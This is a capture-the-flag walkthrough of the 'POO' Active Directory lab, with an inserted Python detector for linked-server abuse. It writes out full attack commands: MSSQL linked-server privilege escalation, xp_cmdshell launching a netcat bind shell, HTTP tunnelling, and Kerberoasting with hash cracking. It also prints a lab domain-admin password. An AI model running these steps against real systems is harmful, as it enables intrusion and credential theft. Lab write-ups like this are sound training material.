In this article we will look at not just a single machine, but a whole mini-lab from the site.
As stated in the description, POO is designed to test skills at every stage of an attack in a small Active Directory environment. The goal is to compromise the accessible host, escalate privileges and, ultimately, compromise the entire domain, collecting five flags along the way.
The lab is reached over VPN. It is recommended not to connect from a work computer or from a host holding data that matters to you, since you are joining a private network with people who know a thing or two about information security 🙂
Organizational information
So that you can keep up with new articles, software and other information, I created
All information is provided for educational purposes only. The author of this document accepts no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained from studying this document.
Intro
This endgame consists of two machines and contains five flags.
A description and the address of the accessible host are also given.
Let's begin!
Recon flag
The machine has the IP address 10.13.38.11, which I add to /etc/hosts.
10.13.38.11 poo.htb
The first step is to scan for open ports. Since scanning all ports with nmap takes a long time, I first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at 500 pps.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Now, to get more detailed information about the services running on those ports, we run a scan with the -A option.
nmap -A poo.htb -p80,1433
So we have IIS and MSSQL services. Along the way we learn the real DNS name of the domain and of the computer. On the web server we are greeted by the IIS home page.
Let's enumerate directories. I use gobuster for this. In the parameters we specify the number of threads, 128 (-t), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
So we have HTTP authentication on the /admin directory, as well as an accessible .DS_Store file (the macOS Finder's desktop services store). .DS_Store files hold a user's settings for a folder, such as the list of files, icon positions and the chosen background image. Such a file can end up in the web server's directory by way of the web developers' machines, and from it we recover the directory listing. For this you can use
python3 dsstore_crawler.py -i http://poo.htb/
We get the contents of the directory. The most interesting item here is the /dev directory, in which we can see sources and db files in two branches. We can also recover the first six characters of file and directory names if the service is vulnerable to IIS ShortName enumeration. You can check for this vulnerability using
And we find one file whose name starts with "poo_co". Not knowing what to do next, I simply selected from the directory wordlist all words starting with "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
And iterate over them with wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
And we find the right word! We inspect this file and save the credentials (judging by the DBNAME parameter, they are for MSSQL).
We submit the flag and advance to 20%.
Huh flag
We connect to MSSQL; I use DBeaver.
We find nothing interesting in this database, so let's open a SQL editor and check which users exist.
SELECT name FROM master..syslogins;
We have two logins. Let's check our privileges.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
So, no privileges. Let's look at the linked servers; I wrote about this technique in detail
SELECT * FROM master..sysservers;
So we find another SQL Server. Let's check query execution on this server using openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
And we can even build a tree of queries.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
The point is that when we send a query to a linked server, it is executed in the context of a different user! Let's see which user context we are running in on the linked server.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
And now let's see in which context a query coming back from the linked server to ours is executed!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
So the dbo context should have all privileges. Let's check the privileges when the query comes from the linked server.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
As you can see, we have all privileges! Let's create our own admin this way. But openquery does not allow it, so we do it via EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
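As an added example (not from the original article), here is a small Python triage routine a defender could run over captured T-SQL, for instance from SQL Server Audit or Extended Events, to flag the nested OPENQUERY and EXECUTE ... AT chains used above, in which a low-privileged login borrows the identity of the linked-server mapping. The SENSITIVE list, the regexes and the constructed sample statements are mine; the server names are the ones the article shows.

```python
import re

# Added example: triage T-SQL for linked-server hops and sensitive actions.
# Statements worth an alert when they ride inside a linked-server hop.
SENSITIVE = (
    "create login",
    "alter server role",
    "alter role",
    "sp_execute_external_script",
    "xp_cmdshell",
)

# OPENQUERY("SERVER", '...') names the outer hop first in text order.
_OPENQUERY = re.compile(r'openquery\s*\(\s*"?\[?([A-Za-z0-9_$]+)', re.I)
# EXECUTE('...') AT "SERVER" names the inner hop first, so it is reversed below.
_EXEC_AT = re.compile(r'\)\s*at\s+"?\[?([A-Za-z0-9_$]+)', re.I)


def linked_server_chain(sql):
    """Return the linked servers a statement traverses, outermost hop first."""
    via_openquery = _OPENQUERY.findall(sql)
    via_exec_at = _EXEC_AT.findall(sql)
    return via_openquery + list(reversed(via_exec_at))


def assess(sql):
    """Rate one statement: a multi-hop chain launders the caller's identity;
    sensitive DDL or external-script calls inside a hop are the worst case."""
    chain = linked_server_chain(sql)
    lowered = sql.lower()
    hits = [s for s in SENSITIVE if s in lowered]
    if chain and hits:
        severity = "high"
    elif hits or len(chain) >= 2:
        severity = "medium"
    else:
        severity = "info"
    return {"hops": len(chain), "chain": chain, "sensitive": hits, "severity": severity}


# Constructed samples, shaped like the article's own queries (password is a placeholder).
SAMPLES = {
    "logins": "SELECT name FROM master..syslogins;",
    "tree": """SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');""",
    "login": """EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''PLACEHOLDER_PW'''''') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";""",
    "python": "EXEC sp_execute_external_script @language = N'Python', @script = N'print(1)'",
}

if __name__ == "__main__":
    for label, statement in SAMPLES.items():
        print(label, assess(statement))
```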
And now we connect as the new user and see the new flag database.
We submit this flag and move on.
Backtrack flag
Let's get a shell through MSSQL; I am using mssqlclient from the impacket package.
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC
We need to find passwords, and the first thing we have already come across is the site. So we want the web server config (a plain reverse shell cannot be spawned; a firewall is evidently in place).
But access is denied. We can still read the file from MSSQL; we just need to find out which scripting languages are configured. And in the MSSQL directory we see that Python is present.
Then there is no problem reading the web.config file.
EXEC sp_execute_external_script
@language = N'Python',
@script = N'print(open(r''C:\inetpub\wwwroot\web.config'').read())'
With the credentials found there, go to /admin and take the flag.
Foothold flag
There are indeed restrictions imposed by the firewall, but looking through the network settings, we notice that IPv6 is in use as well!
Add this address to /etc/hosts.
dead:babe::1001 poo6.htb
Let's scan the host again, this time over IPv6.
And the WinRM service is reachable over IPv6. Let's connect with the credentials we found.
There is a flag on the desktop; submit it.
P00ned flag
After querying the host with
setspn.exe -T intranet.poo -Q */*
Let's run the command through MSSQL.
This way we find SPNs for the users p00_hr and p00_adm, which means they are exposed to Kerberoasting. In short, we can obtain hashes of their passwords.
First we need a stable shell in the context of the MSSQL user. We cannot get one directly, since our only connection to the host is through ports 80 and 1433. But it is possible to tunnel traffic over port 80! For this we will use
But when we try to open it, we get a 404 error. This means that *.aspx files are not being executed. To make files with this extension run, install ASP.NET 4.5 as follows.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
And now, when we request tunnel.aspx, we get a response saying everything is ready to go.
Let's start the client part of the tool, which will forward the traffic. We will forward all traffic from port 5432 to the server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
And we use proxychains to send any application's traffic through our proxy. Let's add this proxy to the /etc/proxychains.conf configuration file.
Now let's upload the program to the server
Then, through MSSQL, we start a listener.
xp_cmdshell 'C:\temp\nc64.exe -e powershell.exe -lvp 4321'
And we connect through our proxy.
proxychains rlwrap nc poo.htb 4321
And let's collect the hashes.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Next, these hashes have to be cracked. Since rockyou did not contain the passwords, I used ALL the password dictionaries shipped in SecLists. For the cracking we use hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
And we recover both passwords, the first from the Dutch_passwordlist.txt dictionary and the second from Keyboard-Combinations.txt.
So now we have three users; let's head for the domain controller. First we find its address.
Good, we have learned the IP address of the domain controller. Let's list all domain users and find out which of them is an administrator. Download the PowerView.ps1 script for gathering this information. Then we connect with evil-winrm, specifying the directory containing the script in the -s parameter, and load the PowerView script.
Now all of its functions are available to us. The p00_adm user looks like a privileged account, so we will work in its context. Let's create a PSCredential object for this user.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Now every PowerShell command in which we pass $Creds will run on behalf of p00_adm. Let's list the users together with the AdminCount attribute.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
And so our user is indeed privileged. Let's see which groups it belongs to.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
We finally confirm that the user is a domain administrator, which gives it the right to log in remotely to the domain controller. Let's try to log in via WinRM through our tunnel. I was thrown by the errors reGeorg produced when used with evil-winrm.
Then we use another, simpler one,
We try to connect, and we are in the system.
But there is no flag. So we check the users and look through their desktops.
On mr3ks we find the flag, and the lab is 100% complete.
That's all. As feedback, comment on whether you learned something new from this article and whether it was useful to you.
You can contact us at
Source: www.habr.com